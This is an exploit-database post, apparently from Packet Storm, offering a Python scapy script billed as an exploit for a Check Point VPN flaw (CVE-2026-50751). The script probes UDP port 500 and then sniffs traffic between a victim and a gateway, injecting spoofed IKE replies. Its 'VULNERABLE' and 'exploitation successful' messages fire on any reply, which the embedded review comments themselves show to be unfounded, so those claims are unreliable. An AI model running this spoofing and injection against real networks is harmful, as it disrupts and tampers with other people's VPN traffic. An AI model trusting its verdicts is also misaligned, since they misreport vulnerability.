## https://sploitus.com/exploit?id=PACKETSTORM:223316
==================================================================================================================================
| # Title : Check Point VPN IKE Legacy Auth Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : A Python script that attempts to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed
IKE_SA_INIT packet to UDP port 500, treating any response from the target
as an indicator of exploitability, and then running a MITM attack to intercept IKE packets between a victim and a VPN gateway.
[+] POC :
#!/usr/bin/env python3
import socket
import struct
import sys
import time
from scapy.all import *
from cryptography.hazmat.primitives.asymmetric import x25519
from cryptography.hazmat.primitives import serialization
class CVE202650751Exploit:
    """scapy helpers that probe UDP/500 (IKE) and spoof replies to sniffed port-500 traffic.

    NOTE(review): despite the class name, nothing in here performs an
    authentication bypass. ``exploit_legacy_auth`` sends one 24-byte datagram
    and reports success on *any* reply, and ``mitm_attack`` answers each sniffed
    port-500 packet with a spoofed copy of its payload. Read the True result as
    'something answered on the port', not as evidence for CVE-2026-50751.
    Detection-wise, the probe is a single UDP datagram to port 500 whose
    24-byte body is too short to parse as an IKEv2 header.
    """

    def __init__(self, target_ip: str, target_port: int = 500):
        """Record the target; no network activity happens here.

        Args:
            target_ip: destination address for the probe.
            target_port: destination UDP port, 500 (IKE) by default.
        """
        self.target_ip = target_ip
        self.target_port = target_port
        # Never read or written anywhere else in this class.
        self.sock = None

    def create_ike_sa_init(self) -> bytes:
        """Build the 24-byte datagram that is sent as the 'malformed IKE_SA_INIT'.

        Returns:
            16 bytes from ``struct.pack`` ('!BBBB I I I' = 4 + 3*4) followed by
            an 8-byte constant tail. The layout does not follow RFC 7296: an
            IKEv2 header alone is 28 octets (two 8-octet SPIs, next payload,
            version, exchange type, flags, message ID, length), so a responder
            is presumably going to discard this as a truncated header rather
            than interpret it as an exchange.
        """
        ike_header = struct.pack('!BBBB I I I',
            0x20,
            0x20,
            0x00,
            0x00,
            0x00000001,
            0x00000000,
            0x00000001
        )
        legacy_payload = bytes([
            0x20,
            0x00,
            0x00, 0x04,
            0x01, 0x02, 0x03, 0x04
        ])
        return ike_header + legacy_payload

    def exploit_legacy_auth(self) -> bool:
        """Send the probe datagram once and report whether anything came back.

        Returns:
            True if ``sr1`` returned a (non-empty) packet within 3 seconds;
            False on timeout or when scapy raised. A True result only shows
            that a host answered on the port.
        """
        print(f"[*] Targeting {self.target_ip}:{self.target_port}")
        # Generated and then never used: neither key takes part in the packet
        # that is sent below.
        private_key = x25519.X25519PrivateKey.generate()
        public_key = private_key.public_key()
        # `random` is not imported by this file's own import lines; it is
        # presumably reached through `from scapy.all import *` — verify.
        packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)
        ike_data = self.create_ike_sa_init()
        print("[*] Sending malicious IKE packet...")
        try:
            response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)
            if response:
                print("[+] Received response - Target may be vulnerable")
                return True
        except Exception as e:
            # Broad catch: any scapy/socket error is printed and then reported
            # exactly like a timeout, so the caller cannot tell the two apart.
            print(f"[-] Exploit failed: {e}")
        return False

    def mitm_attack(self, victim_ip: str, vpn_gateway: str) -> None:
        """Sniff port-500 traffic between two hosts and spoof a reply to every packet.

        Blocks inside ``sniff`` until interrupted. ``victim_ip`` and
        ``vpn_gateway`` only shape the BPF capture filter; the handler itself
        answers any captured UDP packet with port 500 on either side. Nothing
        here drops or rewrites the captured packet, so the genuine datagram
        still reaches its destination — what is produced is an additional
        injected datagram, not an interception.

        Args:
            victim_ip: first host of the capture filter.
            vpn_gateway: second host of the capture filter.
        """
        print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")

        def packet_handler(pkt):
            # Per-packet callback handed to sniff(); runs for each capture that
            # matches the filter.
            if IP in pkt and UDP in pkt:
                if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:
                    print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
                    # pkt[Raw] is indexed without checking that the layer
                    # exists; a port-500 packet carrying no payload makes
                    # scapy raise here, inside the sniff callback.
                    modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD'
                    # Reply spoofed as the original destination, sent back to
                    # the original source with ports swapped and a 7-byte
                    # suffix appended to the original payload.
                    send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/
                         UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/
                         Raw(load=modified_payload), verbose=0)

        sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
              prn=packet_handler, store=0)
def main() -> None:
    """CLI entry point: ``<target_ip> [victim_ip]``.

    Runs the UDP/500 probe against argv[1]. When it returns True, prints the
    'VULNERABLE' verdict and, if exactly one more address was given, starts
    the sniff/spoof loop with argv[2] as the victim and argv[1] as the
    gateway. The verdict rests solely on a reply having been received.
    """
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
        sys.exit(1)
    exploit = CVE202650751Exploit(sys.argv[1])
    if exploit.exploit_legacy_auth():
        # Both lines are printed on any reply; nothing at this point
        # distinguishes a patched responder from an unpatched one.
        print("\n[!] VULNERABLE - Legacy client authentication bypass possible!")
        print("[!] CVE-2026-50751 exploitation successful")
        # Only exactly three argv entries start the second phase; extra
        # arguments are silently ignored.
        if len(sys.argv) == 3:
            print(f"[*] Initiating MITM attack against {sys.argv[2]}")
            # argv[2] is the victim, argv[1] (the host just probed) the gateway.
            exploit.mitm_attack(sys.argv[2], sys.argv[1])
    else:
        print("\n[+] Target appears patched or not vulnerable")
# Run only when executed directly, not when imported.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================